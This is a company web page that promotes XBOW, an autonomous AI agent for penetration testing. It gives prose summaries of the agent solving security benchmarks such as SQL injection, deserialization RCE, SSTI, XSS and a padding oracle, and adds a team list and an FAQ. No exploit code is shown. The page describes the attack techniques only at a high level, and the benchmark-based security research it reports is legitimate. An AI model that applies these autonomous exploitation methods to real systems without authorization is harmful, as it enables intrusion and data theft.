
Boosting offensive security with AI
XBOW autonomously finds and exploits vulnerabilities in 75% of web benchmarks
PortSwigger Labs
PentesterLab Exercises
Novel Benchmarks
See XBOW at work
XBOW pursues high-level goals by executing commands and reviewing their output, without any human intervention.
These are real examples of XBOW solving benchmarks. The only guidance provided to XBOW, aside from general instructions that are identical for every task, is the benchmark description. If you'd like to see all the data,click here.
Breaking a Cryptographic CAPTCHA with a CBC Padding Oracle
Don't roll your own crypto—or XBOW might break it. This trace shows XBOW pulling off a classicPadding Oracle attack on an AES-CBC implementation in the novel XBOW benchmark "Bad Captcha". By manipulating the authentication cookie used by the app, XBOW is able todecrypt the secret one byte at a time and use it to register a new user.
Copied to clipboard!
Exploiting Insecure Direct Object Reference (IDOR) in a GraphQL API
Even when weentirely removed the benchmark description provided by its author, XBOW still solved this novel benchmark. From nothing but a login page, it guesses a valid username and password, analyzes the code of the prescription management app, and uses GraphQL introspection queries to view the prescriptions of all users on the site—finding one that holds the flag.
Copied to clipboard!
Debugging, Testing, and Refining a Jenkins Remote Code Execution Exploit
After a benchmark bug made this"Medium" difficulty PentesterLab exercise much more difficult than intended, XBOW beats the odds by debugging not only its own code but thecompromised server as well. Its final solution—a Python program that exploits XML deserialization to deploy an embeddedbash
script, stealing secrets from running processes' command lines—is a thing of beauty.
Copied to clipboard!
Researching and Implementing an Exploit for a node-jose Vulnerability
Faced with the task of exploiting CVE-2018-0114 innode-jose
, XBOW combs through reams of GitHub issues and then uses what it learns tocraft a custom proof-of-concept exploit to solve anexercise from PentesterLab rated "Hard".
Copied to clipboard!
Leveraging Weak Credentials to Exploit SSTI Vulnerabilities
After brute-forcing its way through the login system, XBOW explores the web app's internals and uncovers aServer-Side Template Injection (SSTI) vulnerability that allows executing arbitrary code remotely. As it proceeds, its payloads grow fearsomely complex, but its final solution to this novel XBOW benchmark is simple and elegant.
Copied to clipboard!
Exploiting Blind SQL Injection from Scratch
XBOW can use existing tools, but it alsounderstands the fundamentals. In this trace, it solves a"Practitioner"-level PortSwigger Blind SQL Injection lab without usingsqlmap
. Instead, it identifies a difference in how the server responds to different malformed SQL queries, and then exploits that difference to leak out the admin password one character at a time.
Copied to clipboard!
Subverting Java Deserialization with Apache Commons
Despite facing a litany of technical challenges brought on by Java version incompatibilities, XBOW solves a"Practitioner"-level PortSwigger lab by subverting Java's mechanism for reconstructing an object from a sequence of bytes toexecute arbitrary code when the unsuspecting application deserializes untrusted data.
Copied to clipboard!
Bypassing Filters and Exploiting Complex Cross-Site Scripting (XSS)
In this novel XBOW benchmark, XBOW detects one of theOWASP Top 10 most common vulnerabilities: Cross-Site Scripting (XSS). By hacking its way through a thicket of security filters, XBOW is able to find a bypass and exploit the XSS by usingHTML entities encoding.
Copied to clipboard!
Writing a Customized SHA-256 Implementation for a Hash Length Extension Attack
To solve thisPentesterLab "Hard" exercise (completed by only 649 human users on the site), XBOWwrites its own implementation of SHA-256 from scratch and uses it to build a directory traversal payload with a forged signature using a hash extension attack—allwithout access to the tutorial given to human solvers.
Copied to clipboard!
Team
Security, AI, and Engineering

Oege de Moor
Founder and CEO

Nico Waisman
Head of Security

Albert Ziegler
Head of AI

Andrew Rice
Head of Engineering

Aqeel Siddiqui
Head of Operations

Alex Gatzlaff
Account Executive

Alvaro Muñoz
Security Researcher

Brendan Coll
Research Engineer

Brendan Dolan-Gavitt
AI Researcher

Daniel Wagner
Research Engineer

Diego Jurado
Security Researcher

Ewan Mellor
Research Engineer

Fernando Russ
Research Engineer

Ian Campbell
Research Engineer

Javier Gil
Security Researcher

Joanna Clifton
Operations

Joel Noguera
Security Researcher

Johan Rosenkilde
AI Researcher

Jordan McTaggart
Finance and Operations

Max Schaefer
AI Researcher

Meurig Thomas
Research Engineer

Nicolas Trippar
Security Researcher

Thomas Bolton
AI Researcher

Blog
Updates and opinions from the team
December 20, 2024 - By Nico Waisman
The Nightmare Before Christmas: An arbitrary file download on Zoo-Project
XBOW discovered an arbitrary file download vulnerability on the WPS open source app Zoo-Project.
Read postDecember 13, 2024 - By Diego Jurado
Stored Cross-Site Scripting (XSS) in 2FAuth
XBOW discovered a Cross-Site Scripting (XSS) vulnerability in the open-source project, 2FAuth.
Read postDecember 2, 2024 - By Diego Jurado
LabsAI’s EDDI project path traversal
XBOW discovered a Path Traversal vulnerability in the open-source project, LabsAI’s EDDI.
Read postShow more
Frequently asked questions
Benchmarks
What do you consider a “benchmark”?
A benchmark is a realistic exercise in web security, with a crisp success criterion like capturing a flag. Manychallenges in CTF contests do not qualify because they are brainteasers rather than reflecting a realistic web securityscenario.
Where did XBOW get its collection of benchmarks?
XBOW’s benchmarks have been carefully selected for relevance and breadth by its security experts. Sources includeleading vendors of training materials, such as PortSwigger and PentesterLab, and public CTF competitions. Somebenchmarks have been authored specifically for XBOW, so we can be sure they do not occur in any training sets.
The original PortSwigger labs do not have flags — why do the traces shown for these benchmarks include a flag?
The PortSwigger labs detect automatically whether you have solved the lab or not. However, we wanted all benchmarks tohave the same crisp success criterion which can be checked by our infrastructure. So we introduced a flag and amechanism for returning it.
Could you provide more information about the novel XBOW benchmarks?
XBOW’s security experts designed a set of unique web benchmarks to ensure that solutions were never included in anytraining data. The benchmarks are representative of many vulnerability classes, and varying degrees of difficulty.
Will the novel XBOW benchmarks be released?
Yes. The novel XBOW benchmarks will be open-sourced soon. We hope others will join us in using these benchmarksto set a new standard for the evaluation of security tools.
How many benchmarks does XBOW have?
XBOW has collected a corpus of thousands of benchmarks, both for the purpose of evaluating performance, and forimproving performance.
Where can I find more details about the benchmarks that XBOW solved?
We provide more details to back up the results reported on this website. Seeherefor the benchmarks that were attempted, and which were solved.
Technology
How does the AI inside XBOW work?
It is an example of ‘agentic AI’. We use many standard techniques, but also plenty of proprietary innovations. Asidefrom general guidance that is identical for every task, the only directions given to XBOW are the basic benchmarkdescription.
As a growing startup, this intellectual property is our main asset, so we cannot share the details.
Are the example traces shown edited?
The AI reasoning and command outputs shown in our example traces have not been edited in any way (e.g., wrapped lines are still present). We have withheld the general guidance (“prompts”) to protect XBOW’s proprietary technology.
Can XBOW find and exploit vulnerabilities without providing descriptions or without having “flags” as a goal?
Yes, we have run experiments byblanking out the descriptions and that works fine. Without flags as a goal, XBOW decideson its own when it has finished. You can prompt it to be more or less aggressive - for example, when it discovers a SQLinjection, it can (after approval from a human operator) continue to exfiltrate valuable data from the database, or juststop and report the core problem.
Is XBOW useful for everyone or does it require any sort of specific knowledge?
XBOW is useful for anyone looking to improve the security of their web applications. You don’t need to be a security orAI expert to use it—a lot of deep security knowledge is baked into the XBOW product. This is the magic of our team,combining such security expertise with AI and engineering skills.
Responsible AI
How will you ensure your technology won't be misused?
We will only make our technology available to trusted customers in the cloud. It is not possible to run XBOW as a standalone applicationoutside our control.